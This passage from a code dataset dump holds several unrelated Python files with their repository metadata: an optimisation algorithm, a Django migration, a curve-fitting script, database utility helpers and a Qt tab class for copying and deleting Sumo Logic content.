# pop[i] = [Y, fit_Y]
# if fit_Z < pop[i][self.ID_FIT]:
# pop[i] = [Z, fit_Z]
pop, g_best = self._sort_pop_and_update_global_best__(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.print_train:
print("> Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train | en | 0.4959 | #!/usr/bin/env python # ------------------------------------------------------------------------------------------------------% # Created by "<NAME>" at 14:52, 17/03/2020 % # % # Email: <EMAIL> % # Homepage: https://www.researchgate.net/profile/Thieu_Nguyen6 % # Github: https://github.com/thieunguyen5991 % #-------------------------------------------------------------------------------------------------------% The original version of: Naked Mole-rat Algorithm (NMRA) (The naked mole-rat algorithm) Link: https://www.doi.org10.1007/s00521-019-04464-7 # breeding probability (0.75) # breeding operators # working operators My speedup version of: Naked Mole-rat Algorithm (NMRA) (The naked mole-rat algorithm) # muy and v are two random variables which follow normal distribution # sigma_muy : standard deviation of muy # sigma_v : standard deviation of v # D is a random solution # x_new = solution[0] + 1.0/sqrt(epoch+1) * sign(uniform() - 0.5) * levy # return x_new ### Mutation # Exploration # breeding operators #temp = self._crossover__(pop[i], g_best) # Exploitation # working operators # Mutation #temp = self._random_amend_solution_and_return__(temp) # xichma = power((gamma(1 + 1.5) * sin(pi * 1.5 / 2.0)) / (gamma((1 + 1.5) * 1.5 * power(2, (1.5 - 1) / 2)) / 2.0), 1.0 / 1.5) # LF_D = 0.01 * uniform() * xichma / power(abs(uniform()), 1.0 / 1.5) # J = 2 * (1 - uniform()) # w = 1 - (epoch + 1) * 1.0 / self.epoch # Y = g_best[self.ID_POS] - w * abs(J * g_best[self.ID_POS] - pop[i][self.ID_POS]) # Z = Y + uniform(self.domain_range[0], self.domain_range[1], self.problem_size) * LF_D # # fit_Y = self._fitness_model__(Y) # fit_Z = self._fitness_model__(Z) # if fit_Y < pop[i][self.ID_FIT]: # pop[i] = [Y, fit_Y] # if fit_Z < pop[i][self.ID_FIT]: # pop[i] = [Z, fit_Z] | 2.536007 | 3 |
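The Lévy step built in _levy_flight__ follows Mantegna's recipe. Stripped of the population bookkeeping it reduces to the standalone sketch below (not part of mealpy; the class above additionally draws with sigma squared and scales the step by a random solution, so this is only the core computation).

# Standalone Mantegna-style Levy step for reference.
from math import gamma, sin, pi
from numpy.random import normal

def levy_step(beta: float = 1.5) -> float:
    sigma_mu = (gamma(1 + beta) * sin(pi * beta / 2)
                / (gamma((1 + beta) / 2) * beta * 2 ** ((beta - 1) / 2))) ** (1 / beta)
    mu = normal(0, sigma_mu)
    v = normal(0, 1)
    return mu / abs(v) ** (1 / beta)

print(levy_step())  # heavy-tailed step size, occasionally very large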
cases/migrations/0007_auto_20200313_1736.py | brokenloop/covidmapping-api | 1 | 6616712 | # Generated by Django 3.0.4 on 2020-03-13 21:36
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('cases', '0006_auto_20200312_2021'),
]
operations = [
migrations.AddField(
model_name='coronacaseraw',
name='date_received',
field=models.DateTimeField(default=django.utils.timezone.now),
),
migrations.AddField(
model_name='coronacaseraw',
name='update_flag',
field=models.BooleanField(default=False),
),
]
| # Generated by Django 3.0.4 on 2020-03-13 21:36
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('cases', '0006_auto_20200312_2021'),
]
operations = [
migrations.AddField(
model_name='coronacaseraw',
name='date_received',
field=models.DateTimeField(default=django.utils.timezone.now),
),
migrations.AddField(
model_name='coronacaseraw',
name='update_flag',
field=models.BooleanField(default=False),
),
]
| en | 0.734252 | # Generated by Django 3.0.4 on 2020-03-13 21:36 | 1.614188 | 2 |
dynaban/pypot/equation_find_trial_multi_motor.py | laukik-hase/imitation_of_human_arm_on_robotic_manipulator | 3 | 6616713 | <reponame>laukik-hase/imitation_of_human_arm_on_robotic_manipulator
import math
import matplotlib.pyplot as plt
import numpy as np
from scipy.optimize import curve_fit
import csv
def func2(t, a, b, c, d):
return a*pow(t, 3) + b*pow(t, 2) + c*t + d
def read_file(inp):
data = []
cp = []
with open(inp, 'r') as file:
reader = csv.reader(file)
for row in reader:
data.append(list(map(int, row)))
res, t = [], []
k = 1
for element in data:
if element[0] <= k * 500:
t.append(element[1])
else:
k = k + 1
res.append(t)
t = []
t.append(element[1])
cp.append(element[0])
    if t:
        res.append(t)  # keep the final (possibly partial) window instead of dropping it
    return res, cp
# main Program
file_name1 = input('Enter csv file for motor 1: ')
angle1, timestamp1 = read_file(file_name1)
file_name2 = input('Enter csv file for motor 2: ')
angle2, timestamp2 = read_file(file_name2)
# file_name3 = input('Enter csv file for motor 3: ')
# angle3, timestamp3 = read_file(file_name3)
# file_name4 = input('Enter csv file for motor 4: ')
# angle4, timestamp4 = read_file(file_name4)
coeff1 = {}
pcov1 = {}
count1 = 0
for value in angle1:
coeff1[count1], pcov1[count1] = curve_fit(func2, np.linspace(0,0.5,len(value)),value)
print(coeff1[count1],count1)
count1 = count1 + 1
coeff2 = {}
pcov2 = {}
count2 = 0
for value in angle2:
coeff2[count2], pcov2[count2] = curve_fit(func2, np.linspace(0,0.5,len(value)),value)
print(coeff2[count2],count2)
count2 = count2 + 1
# coeff3 = {}
# pcov3 = {}
# count3 = 0
# for value in angle3:
# coeff3[count3], pcov3[count3] = curve_fit(func2, np.linspace(0,0.5,len(value)),value)
# print(coeff3[count3],count3)
# count3 = count3 + 1
# coeff4 = {}
# pcov4 = {}
# count4 = 0
# for value in angle4:
# coeff4[count4], pcov4[count4] = curve_fit(func2, np.linspace(0,0.5,len(value)),value)
# print(coeff4[count4],count4)
# count4 = count4 + 1 | import math
import matplotlib.pyplot as plt
import numpy as np
from scipy.optimize import curve_fit
import csv
def func2(t, a, b, c, d):
return a*pow(t, 3) + b*pow(t, 2) + c*t + d
def read_file(inp):
data = []
cp = []
with open(inp, 'r') as file:
reader = csv.reader(file)
for row in reader:
data.append(list(map(int, row)))
res, t = [], []
k = 1
for element in data:
if element[0] <= k * 500:
t.append(element[1])
else:
k = k + 1
res.append(t)
t = []
t.append(element[1])
cp.append(element[0])
    if t:
        res.append(t)  # keep the final (possibly partial) window instead of dropping it
    return res, cp
# main Program
file_name1 = input('Enter csv file for motor 1: ')
angle1, timestamp1 = read_file(file_name1)
file_name2 = input('Enter csv file for motor 2: ')
angle2, timestamp2 = read_file(file_name2)
# file_name3 = input('Enter csv file for motor 3: ')
# angle3, timestamp3 = read_file(file_name3)
# file_name4 = input('Enter csv file for motor 4: ')
# angle4, timestamp4 = read_file(file_name4)
coeff1 = {}
pcov1 = {}
count1 = 0
for value in angle1:
coeff1[count1], pcov1[count1] = curve_fit(func2, np.linspace(0,0.5,len(value)),value)
print(coeff1[count1],count1)
count1 = count1 + 1
coeff2 = {}
pcov2 = {}
count2 = 0
for value in angle2:
coeff2[count2], pcov2[count2] = curve_fit(func2, np.linspace(0,0.5,len(value)),value)
print(coeff2[count2],count2)
count2 = count2 + 1
# coeff3 = {}
# pcov3 = {}
# count3 = 0
# for value in angle3:
# coeff3[count3], pcov3[count3] = curve_fit(func2, np.linspace(0,0.5,len(value)),value)
# print(coeff3[count3],count3)
# count3 = count3 + 1
# coeff4 = {}
# pcov4 = {}
# count4 = 0
# for value in angle4:
# coeff4[count4], pcov4[count4] = curve_fit(func2, np.linspace(0,0.5,len(value)),value)
# print(coeff4[count4],count4)
# count4 = count4 + 1 | en | 0.643016 | # main Program # file_name3 = input('Enter csv file for motor 3: ') # angle3, timestamp3 = read_file(file_name3) # file_name4 = input('Enter csv file for motor 4: ') # angle4, timestamp4 = read_file(file_name4) # coeff3 = {} # pcov3 = {} # count3 = 0 # for value in angle3: # coeff3[count3], pcov3[count3] = curve_fit(func2, np.linspace(0,0.5,len(value)),value) # print(coeff3[count3],count3) # count3 = count3 + 1 # coeff4 = {} # pcov4 = {} # count4 = 0 # for value in angle4: # coeff4[count4], pcov4[count4] = curve_fit(func2, np.linspace(0,0.5,len(value)),value) # print(coeff4[count4],count4) # count4 = count4 + 1 | 3.06199 | 3 |
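The fitting step in the script is just scipy's curve_fit against the cubic func2. A self-contained sanity check on synthetic data (made-up coefficients, not robot recordings) looks like this:

# Synthetic sanity check for the cubic fit used above.
import numpy as np
from scipy.optimize import curve_fit

def func2(t, a, b, c, d):
    return a * t**3 + b * t**2 + c * t + d

t = np.linspace(0, 0.5, 50)
y = func2(t, 2.0, -1.0, 0.5, 10.0) + np.random.normal(0, 0.01, t.size)
coeff, _ = curve_fit(func2, t, y)
print(coeff)  # should recover roughly [2, -1, 0.5, 10]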
dbbase/utils.py | sidorof/dbbase | 0 | 6616714 | # dbbase/utils.py
"""
This module implements some utilities.
"""
import string
import json
import logging
logger = logging.getLogger(__file__)
def db_config(base, config_vars=None):
"""
This function combines config variables with a base string.
It is a convenience function for combining data elements
to make a string that represents a database URI.
Default:
db_config(base, config_vars=None)
Args:
base: (str) : a string that is the db template, such as
`"postgresql://{user}:{pass}@{host}:{port}/{dbname}"`
config_vars: (dict) : variables that will be combined with the base.
For example:
'user': 'auser',
'pass': '<PASSWORD>',
'host': 'localhost',
'port': 5432,
'dbname': 'mydatadb'
config_vars can also be a string that successfully converts from JSON
to a dict.
This enables a config to be as simplistic or complex as the situation
warrants.
Returns:
completed_URI (str) : the database URI
"""
if config_vars is None:
config_vars = {}
if isinstance(config_vars, str):
# try to convert from json
config_vars = json.loads(config_vars)
if isinstance(config_vars, dict):
return base.format(**config_vars)
return base
def _is_sqlite(config):
"""_is_sqlite
Default:
_is_sqlite(config)
returns True if config contains the string sqlite
returns True if config contains :memory:
"""
if config.find("sqlite") > -1:
return True
if config.find(":memory:") > -1:
return True
return False
def xlate(key, camel_case=True):
"""
This function translates a name to camel case or back.
Default:
xlate(key, camel_case=True)
Example:
camel_case is True:
start_date would become startDate
startdate would remain startdate
camel_case is False:
startDate would become start_date
startdate would remain startdate
Args:
key: (str) : the key that would be converted
camel_case: (bool) : True to convert to camel case
Returns:
key (str) : the converted string
"""
if camel_case:
return _xlate_camel_case(key)
return _xlate_from_camel_case(key)
def _xlate_camel_case(key):
"""Convert example: start_date -> startDate """
if key.find("_") > -1:
key = string.capwords(key.replace("_", " ")).replace(" ", "")
key = key[0].lower() + key[1:]
return key
def _xlate_from_camel_case(key):
"""Convert example: startDate -> start_date """
new_key = ""
for char in key:
if char in string.ascii_uppercase:
new_key += "_" + char.lower()
else:
new_key += char
if new_key.startswith("_"):
new_key = new_key[1:]
return new_key
def get_model_defaults(cls):
"""
This function receives a model class and returns the default values
for the class in the form of a dict.
If the default value is a function, the function will be executed. This is meant for simple functions such as datetime and uuid.
Args:
cls: (obj) : A Model class.
Returns:
defaults: (dict) : A dictionary of the default values.
"""
tmp = {}
for key in cls.__dict__.keys():
col = cls.__dict__[key]
if hasattr(col, "expression"):
if col.expression.default is not None:
arg = col.expression.default.arg
if callable(arg):
tmp[key] = arg(cls.db)
else:
tmp[key] = arg
return tmp
| # dbbase/utils.py
"""
This module implements some utilities.
"""
import string
import json
import logging
logger = logging.getLogger(__file__)
def db_config(base, config_vars=None):
"""
This function combines config variables with a base string.
It is a convenience function for combining data elements
to make a string that represents a database URI.
Default:
db_config(base, config_vars=None)
Args:
base: (str) : a string that is the db template, such as
`"postgresql://{user}:{pass}@{host}:{port}/{dbname}"`
config_vars: (dict) : variables that will be combined with the base.
For example:
'user': 'auser',
'pass': '<PASSWORD>',
'host': 'localhost',
'port': 5432,
'dbname': 'mydatadb'
config_vars can also be a string that successfully converts from JSON
to a dict.
This enables a config to be as simplistic or complex as the situation
warrants.
Returns:
completed_URI (str) : the database URI
"""
if config_vars is None:
config_vars = {}
if isinstance(config_vars, str):
# try to convert from json
config_vars = json.loads(config_vars)
if isinstance(config_vars, dict):
return base.format(**config_vars)
return base
def _is_sqlite(config):
"""_is_sqlite
Default:
_is_sqlite(config)
returns True if config contains the string sqlite
returns True if config contains :memory:
"""
if config.find("sqlite") > -1:
return True
if config.find(":memory:") > -1:
return True
return False
def xlate(key, camel_case=True):
"""
This function translates a name to camel case or back.
Default:
xlate(key, camel_case=True)
Example:
camel_case is True:
start_date would become startDate
startdate would remain startdate
camel_case is False:
startDate would become start_date
startdate would remain startdate
Args:
key: (str) : the key that would be converted
camel_case: (bool) : True to convert to camel case
Returns:
key (str) : the converted string
"""
if camel_case:
return _xlate_camel_case(key)
return _xlate_from_camel_case(key)
def _xlate_camel_case(key):
"""Convert example: start_date -> startDate """
if key.find("_") > -1:
key = string.capwords(key.replace("_", " ")).replace(" ", "")
key = key[0].lower() + key[1:]
return key
def _xlate_from_camel_case(key):
"""Convert example: startDate -> start_date """
new_key = ""
for char in key:
if char in string.ascii_uppercase:
new_key += "_" + char.lower()
else:
new_key += char
if new_key.startswith("_"):
new_key = new_key[1:]
return new_key
def get_model_defaults(cls):
"""
This function receives a model class and returns the default values
for the class in the form of a dict.
If the default value is a function, the function will be executed. This is meant for simple functions such as datetime and uuid.
Args:
cls: (obj) : A Model class.
Returns:
defaults: (dict) : A dictionary of the default values.
"""
tmp = {}
for key in cls.__dict__.keys():
col = cls.__dict__[key]
if hasattr(col, "expression"):
if col.expression.default is not None:
arg = col.expression.default.arg
if callable(arg):
tmp[key] = arg(cls.db)
else:
tmp[key] = arg
return tmp
| en | 0.683343 | # dbbase/utils.py This module implements some utilities. This function combines config variables with a base string. It is a convenience function for combining data elements to make a string that represents a database URI. Default: db_config(base, config_vars=None) Args: base: (str) : a string that is the db template, such as `"postgresql://{user}:{pass}@{host}:{port}/{dbname}"` config_vars: (dict) : variables that will be combined with the base. For example: 'user': 'auser', 'pass': '<PASSWORD>', 'host': 'localhost', 'port': 5432, 'dbname': 'mydatadb' config_vars can also be a string that successfully converts from JSON to a dict. This enables a config to be as simplistic or complex as the situation warrants. Returns: completed_URI (str) : the database URI # try to convert from json _is_sqlite Default: _is_sqlite(config) returns True if config contains the string sqlite returns True if config contains :memory: This function translates a name to camel case or back. Default: xlate(key, camel_case=True) Example: camel_case is True: start_date would become startDate startdate would remain startdate camel_case is False: startDate would become start_date startdate would remain startdate Args: key: (str) : the key that would be converted camel_case: (bool) : True to convert to camel case Returns: key (str) : the converted string Convert example: start_date -> startDate Convert example: startDate -> start_date This function receives a model class and returns the default values for the class in the form of a dict. If the default value is a function, the function will be executed. This is meant for simple functions such as datetime and uuid. Args: cls: (obj) : A Model class. Returns: defaults: (dict) : A dictionary of the default values. | 3.276829 | 3 |
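Both helpers above are pure functions, so they are easy to exercise directly. The values below are made up for illustration:

# Quick illustration of db_config and xlate (made-up credentials).
from dbbase.utils import db_config, xlate

uri = db_config(
    "postgresql://{user}:{pass}@{host}:{port}/{dbname}",
    {"user": "auser", "pass": "apassword", "host": "localhost", "port": 5432, "dbname": "mydatadb"},
)
# uri == "postgresql://auser:apassword@localhost:5432/mydatadb"

assert xlate("start_date") == "startDate"
assert xlate("startDate", camel_case=False) == "start_date"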
modules/tab_base_class.py | voltaire321/sumologictoolbox | 24 | 6616715 | <gh_stars>10-100
from qtpy import QtCore, QtGui, QtWidgets, uic
from modules.multithreading import Worker, ProgressDialog
from modules.shared import ShowTextDialog, exception_and_error_handling
from modules.filesystem_adapter import FilesystemAdapter
import pathlib
import json
import re
import os
from logzero import logger
class_name = 'baseTab'
class FindReplaceCopyDialog(QtWidgets.QDialog):
def __init__(self, fromcategories, tocategories, parent=None):
super(FindReplaceCopyDialog, self).__init__(parent)
self.objectlist = []
self.setup_ui(self, fromcategories, tocategories)
def setup_ui(self, Dialog, fromcategories, tocategories):
# setup static elements
Dialog.setObjectName("FindReplaceCopy")
Dialog.setMinimumWidth(700)
Dialog.setWindowTitle('Dynamically Replace Source Category Strings')
QBtn = QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel
self.buttonBox = QtWidgets.QDialogButtonBox(QBtn)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
# set up the list of destination categories to populate into the comboboxes
itemmodel = QtGui.QStandardItemModel()
for tocategory in tocategories:
text_item = QtGui.QStandardItem(str(tocategory))
itemmodel.appendRow(text_item)
itemmodel.sort(0)
self.layoutSelections = QtWidgets.QGridLayout()
self.labelReplace = QtWidgets.QLabel()
self.labelReplace.setText("Replace")
self.layoutSelections.addWidget(self.labelReplace, 0, 0)
self.labelOriginal = QtWidgets.QLabel()
self.labelOriginal.setText("Original Source Category")
self.layoutSelections.addWidget(self.labelOriginal, 0, 1)
self.labelReplaceWith = QtWidgets.QLabel()
self.labelReplaceWith.setText("With:")
self.layoutSelections.addWidget(self.labelReplaceWith, 0, 2)
        # Create 1 set of (checkbox, label, combobox) per fromcategory
for index, fromcategory in enumerate(fromcategories):
objectdict = {'checkbox': None, 'label': None, 'combobox': None}
objectdict['checkbox'] = QtWidgets.QCheckBox()
objectdict['checkbox'].setObjectName("checkBox" + str(index))
objectdict['checkbox'].setSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
self.layoutSelections.addWidget(objectdict['checkbox'], index + 1, 0)
            objectdict['label'] = QtWidgets.QLabel()
objectdict['label'].setObjectName("comboBox" + str(index))
objectdict['label'].setText(fromcategory)
objectdict['label'].setSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
self.layoutSelections.addWidget(objectdict['label'], index + 1, 1)
objectdict['combobox'] = QtWidgets.QComboBox()
objectdict['combobox'].setObjectName("comboBox" + str(index))
objectdict['combobox'].setModel(itemmodel)
objectdict['combobox'].setEditable(True)
objectdict['combobox'].setSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
self.layoutSelections.addWidget(objectdict['combobox'], index + 1, 2)
self.objectlist.append(objectdict)
self.groupBox = QtWidgets.QGroupBox()
self.groupBox.setLayout(self.layoutSelections)
        # Create a vertical scroll area with a grid layout inside with label headers
self.scrollArea = QtWidgets.QScrollArea()
self.scrollArea.setWidget(self.groupBox)
self.scrollArea.setWidgetResizable(True)
#self.scrollArea.setFixedHeight(400)
self.scrollArea.setMaximumHeight(500)
self.scrollArea.setMinimumWidth(700)
self.layout = QtWidgets.QVBoxLayout()
self.layout.addWidget(self.scrollArea)
self.layout.addWidget(self.buttonBox)
self.setLayout(self.layout)
def getresults(self):
results = []
for object in self.objectlist:
if str(object['checkbox'].checkState()) == '2':
objectdata = { 'from': str(object['label'].text()), 'to': str(object['combobox'].currentText())}
results.append(objectdata)
return results
class BaseTab(QtWidgets.QWidget):
def __init__(self, mainwindow):
super(BaseTab, self).__init__()
self.mainwindow = mainwindow
self.tab_name = 'Base'
self.cred_usage = 'both'
# Override the font
self.font = "Waree"
self.font_size = 12
# things needed for multithreading
self.workers = []
self.num_successful_threads = 0
self.load_icons()
def reset_stateful_objects(self, side='both'):
self.left = None
self.right = None
if side == 'both':
self.left = True
self.right = True
if side == 'left':
self.left = True
self.right = False
if side == 'right':
self.left = False
self.right = True
self.left_creds = self.mainwindow.get_current_creds('left')
self.right_creds = self.mainwindow.get_current_creds('right')
def load_icons(self):
self.icons = {}
icon_path = str(pathlib.Path(self.mainwindow.basedir + '/data/folder.svg'))
self.icons['Folder'] = QtGui.QIcon(icon_path)
def set_listwidget_filter(self, list_widget, filter_text):
for row in range(list_widget.count()):
item = list_widget.item(row)
if filter_text:
item.setHidden(not filter_text in item.text())
else:
item.setHidden(False)
# Thanks Stackoverflow. Yoink!
def find_keys(self, obj, key):
"""Pull all values of specified key from nested JSON."""
arr = []
def extract(obj, arr, key):
"""Recursively search for values of key in JSON tree."""
if isinstance(obj, dict):
for k, v in obj.items():
if isinstance(v, (dict, list)):
extract(v, arr, key)
elif k == key:
arr.append(v)
elif isinstance(obj, list):
for item in obj:
extract(item, arr, key)
return arr
results = extract(obj, arr, key)
return results
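        # For example (illustrative values only):
        #   self.find_keys({"search": {"queryText": "q1"},
        #                   "panels": [{"queryString": "q2"}]}, "queryText")
        #   -> ["q1"]
        # i.e. every value stored under the requested key, at any nesting depth.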
def _find_replace_specific_key_and_value(self, obj, key, old_value, new_value):
if isinstance(obj, dict):
for k, v in obj.items():
if isinstance(v, (dict, list)):
obj[k] = self._find_replace_specific_key_and_value(v, key, old_value, new_value)
elif k == key and v == old_value:
obj[k] = new_value
elif isinstance(obj, list):
for index, item in enumerate(obj):
obj[index] = self._find_replace_specific_key_and_value(item, key, old_value, new_value)
return obj
def recurse_replace_query_strings(self, query_string_replacement_list, exported_json):
if exported_json['type'] == "SavedSearchWithScheduleSyncDefinition":
for query_string_replacement in query_string_replacement_list:
if query_string_replacement['from'] in exported_json['search']['queryText']:
exported_json['search']['queryText'] = exported_json['search']['queryText'].replace(
str(query_string_replacement['from']),
str(query_string_replacement['to']))
break
return exported_json
elif exported_json['type'] == "DashboardSyncDefinition":
for panelnum, panel in enumerate(exported_json['panels'], start=0):
if panel['viewerType'] == "metrics": # there can be multiple query strings so we have an extra loop here
for querynum, metrics_query in enumerate(panel['metricsQueries'], start=0):
for query_string_replacement in query_string_replacement_list:
if query_string_replacement['from'] in metrics_query['query']:
metrics_query['query'] = metrics_query['query'].replace(
str(query_string_replacement['from']),
str(query_string_replacement['to']))
break
panel['metricsQueries'][querynum] = metrics_query
else: # if panel is a log panel
for query_string_replacement in query_string_replacement_list:
if query_string_replacement['from'] in panel['queryString']:
panel['queryString'] = panel['queryString'].replace(
str(query_string_replacement['from']),
str(query_string_replacement['to']))
break
exported_json['panels'][panelnum] = panel
return exported_json
elif exported_json['type'] == "DashboardV2SyncDefinition": # if it's a new style dashboard
for panelnum, panel in enumerate(exported_json['panels'], start=0):
for querynum, query in enumerate(panel['queries']):
for query_string_replacement in query_string_replacement_list:
if query_string_replacement['from'] in query['queryString']:
query['queryString'] = query['queryString'].replace(
str(query_string_replacement['from']),
str(query_string_replacement['to']))
break
panel['queries'][querynum] = query
exported_json['panels'][panelnum] = panel
return exported_json
elif exported_json['type'] == "FolderSyncDefinition":
children = []
for object in exported_json['children']:
children.append(self.recurse_replace_query_strings(query_string_replacement_list, object))
exported_json['children'] = children
return exported_json
def clear_filters(self, list_widget):
pass
@exception_and_error_handling
def update_item_list(self, list_widget, adapter, path_label=None):
mode_param = {'mode': list_widget.mode}
merged_params = {**list_widget.params, **mode_param}
contents = adapter.list(params=merged_params)
logger.debug(f'[Tab Base Class] Updating item list, got: {contents}')
self.update_list_widget(list_widget, adapter, contents, path_label=path_label)
self.clear_filters(list_widget)
def create_list_widget_item(self, item):
item_name = str(item['name'])
if ('contentType' in item) and (item['contentType'] == 'Folder'):
list_item = QtWidgets.QListWidgetItem(self.icons['Folder'], item_name)
elif ('itemType' in item) and (item['itemType'] == 'Folder'):
list_item = QtWidgets.QListWidgetItem(self.icons['Folder'], item_name)
else:
list_item = QtWidgets.QListWidgetItem(item_name)
return list_item
def update_list_widget(self, list_widget, adapter, payload, path_label=None):
try:
list_widget.clear()
count = 0
for item in payload:
list_item = self.create_list_widget_item(item)
# attach the details about the item to the entry in listwidget, this makes life much easier
list_item.details = item
list_widget.addItem(list_item) # populate the list widget in the GUI with no icon (fallthrough)
count += 1
if path_label:
path_label.setText(adapter.get_current_path())
list_widget.updated = True
except Exception as e:
list_widget.clear()
list_widget.updated = False
logger.exception(e)
return
@exception_and_error_handling
def find_replace_metadata(self, adapter, payload):
logger.debug(f"[{self.tab_name}] Replacing Metadata")
source_metadata = []
for item in payload:
# find all the keys in our item that contain queries
query_list = self.find_keys(item, 'queryText')
query_list = query_list + self.find_keys(item, 'query')
query_list = query_list + self.find_keys(item, 'queryString')
# extract the source category from our list of queries
for query in query_list:
source_metadata = source_metadata + re.findall(r'_sourceCategory\s*=\s*\\?\"?([^\s^")]*)\"?',
query)
# de-duplicate the list of source categories
unique_source_metadata = list(set(source_metadata))
# if the destination is a Sumo Instance then query for available metadata tags
if adapter.is_sumo_adapter():
fromtime = str(QtCore.QDateTime.currentDateTime().addSecs(-3600).toString(QtCore.Qt.ISODate))
totime = str(QtCore.QDateTime.currentDateTime().toString(QtCore.Qt.ISODate))
# We query the destination org to get a sample of active source categories
query = r'* | count by _sourceCategory | fields _sourceCategory'
results = adapter.sumo_search_records(query, from_time=fromtime, to_time=totime,
timezone='UTC', by_receipt_time=False)
records = results['payload']
destination_metadata = []
for record in records:
logger.debug(f'Found Source Category:{record}')
destination_metadata.append(record['map']['_sourcecategory'])
unique_destination_metadata = list(set(destination_metadata))
# if the destination is not a Sumo instance then leave the destination metadata tag list empty
else:
unique_destination_metadata = []
dialog = FindReplaceCopyDialog(unique_source_metadata, unique_destination_metadata)
dialog.exec()
dialog.show()
if str(dialog.result()) == '1':
replacelist = dialog.getresults()
logger.debug(f'Metadata replacement list: {replacelist}')
dialog.close()
if len(replacelist) > 0:
new_payload = []
for item in payload:
new_payload.append(self.recurse_replace_query_strings(replacelist, item))
else:
new_payload = payload
return new_payload
else:
return []
@exception_and_error_handling
def begin_copy_content(self,
source_list_widget,
destination_list_widget,
source_adapter,
destination_adapter,
params):
selected_items = source_list_widget.selectedItems()
num_selected_items = len(selected_items)
if num_selected_items < 1: return # make sure something was selected
logger.debug(f"[{self.tab_name}] Exporting Item(s) {selected_items}")
self.num_threads = num_selected_items
self.num_successful_threads = 0
self.copy_export_results = []
self.export_progress = ProgressDialog('Exporting items...', 0, self.num_threads, self.mainwindow.threadpool, self.mainwindow)
self.workers = []
base_params = {'destination_list_widget': destination_list_widget,
'destination_adapter': destination_adapter,
'read_mode': source_list_widget.mode,
'write_mode': destination_list_widget.mode}
merged_params = {**base_params, **params}
merged_params = {**merged_params, **source_list_widget.params}
for index, selected_item in enumerate(selected_items):
if 'id' in selected_item.details:
item_id = selected_item.details['id']
else:
item_id = None
logger.debug(f"Creating copy thread for item {selected_item.details['name']}")
self.workers.append(Worker(source_adapter.export_item,
selected_item.details['name'],
item_id,
params=merged_params
))
self.workers[index].signals.finished.connect(self.export_progress.increment)
self.workers[index].signals.result.connect(self.merge_begin_copy_results)
self.mainwindow.threadpool.start(self.workers[index])
return
def merge_begin_copy_results(self, result):
if result['status'] == 'SUCCESS':
self.num_successful_threads += 1
self.copy_export_results.append(result['payload'])
else:
self.mainwindow.threadpool.clear()
logger.info(f"ERROR: {result['exception']} on line: {result['line_number']}")
self.mainwindow.errorbox('Something went wrong:\n\n' + result['exception'])
if self.num_successful_threads == self.num_threads:
if result['params']['replace_source_categories']:
item_list = self.find_replace_metadata(result['params']['destination_adapter'], self.copy_export_results)
else:
item_list = self.copy_export_results
if len(item_list) == 0: return
logger.debug(f"[{self.tab_name}] Importing Item(s)")
self.num_threads = len(item_list)
self.num_successful_threads = 0
self.copy_export_results = []
self.import_progress = ProgressDialog('Importing items...', 0, self.num_threads, self.mainwindow.threadpool,
self.mainwindow)
self.workers = []
for index, item in enumerate(item_list):
if 'name' in item:
logger.debug(f"Creating copy thread for item {item['name']}")
self.workers.append(Worker(result['params']['destination_adapter'].import_item,
item['name'],
item,
params=result['params']
))
self.workers[index].signals.finished.connect(self.import_progress.increment)
self.workers[index].signals.result.connect(self.merge_results_update_target)
self.mainwindow.threadpool.start(self.workers[index])
def merge_results_update_target(self, result):
if result['status'] == 'SUCCESS':
self.num_successful_threads += 1
else:
self.mainwindow.threadpool.clear()
logger.info(f"ERROR: {result['exception']} on line: {result['line_number']}")
self.mainwindow.errorbox('Something went wrong:\n\n' + result['exception'])
if self.num_successful_threads == self.num_threads:
self.update_item_list(result['params']['destination_list_widget'], result['adapter'])
@exception_and_error_handling
def delete_item(self, list_widget, adapter):
selected_items = list_widget.selectedItems()
if len(selected_items) < 1: return # make sure something was selected
logger.debug(f"[{self.tab_name}] Deleting Item(s) {selected_items}")
message = "You are about to delete the following item(s):\n\n"
for selected_item in selected_items:
message = message + str(selected_item.text()) + "\n"
message = message + '''
This is exceedingly DANGEROUS!!!!
Please be VERY, VERY, VERY sure you want to do this!
You could lose quite a bit of work if you delete the wrong thing(s).
If you are absolutely sure, type "DELETE" in the box below.
'''
text, result = QtWidgets.QInputDialog.getText(self, 'Warning!!', message)
if (result and (str(text) == 'DELETE')):
self.num_threads = len(selected_items)
self.num_successful_threads = 0
self.progress = ProgressDialog('Deleting items...', 0, self.num_threads, self.mainwindow.threadpool,
self.mainwindow)
self.workers = []
params = {'destination_list_widget': list_widget,
'destination_adapter': adapter,
'mode': list_widget.mode}
for index, selected_item in enumerate(selected_items):
item_name = selected_item.details['name']
if 'id' in selected_item.details:
item_id = selected_item.details['id']
else:
item_id = None
logger.debug(f"Creating delete thread for item {item_name}")
self.workers.append(Worker(adapter.delete,
item_name,
item_id,
params=params))
self.workers[index].signals.finished.connect(self.progress.increment)
self.workers[index].signals.result.connect(self.merge_results_update_target)
self.mainwindow.threadpool.start(self.workers[index])
@exception_and_error_handling
def view_json(self, list_widget, adapter):
selected_items = list_widget.selectedItems()
if len(selected_items) < 1: return # make sure something was selected
logger.debug(f"[Content] Viewing JSON {selected_items}")
self.num_threads = len(selected_items)
self.num_successful_threads = 0
self.progress = ProgressDialog('Viewing items...', 0, self.num_threads, self.mainwindow.threadpool, self.mainwindow)
self.json_text = ''
self.workers = []
params = {'read_mode': list_widget.mode,
'list_widget': list_widget}
for index, selected_item in enumerate(selected_items):
item_name = selected_item.details['name']
if 'id' in selected_item.details:
item_id = selected_item.details['id']
else:
item_id = None
logger.debug(f"Creating view thread for item {item_name}")
self.workers.append(Worker(adapter.get,
item_name,
item_id,
params=params))
self.workers[index].signals.finished.connect(self.progress.increment)
self.workers[index].signals.result.connect(self.merge_view_json_results)
self.mainwindow.threadpool.start(self.workers[index])
def merge_view_json_results(self, result):
if result['status'] == 'SUCCESS':
self.num_successful_threads += 1
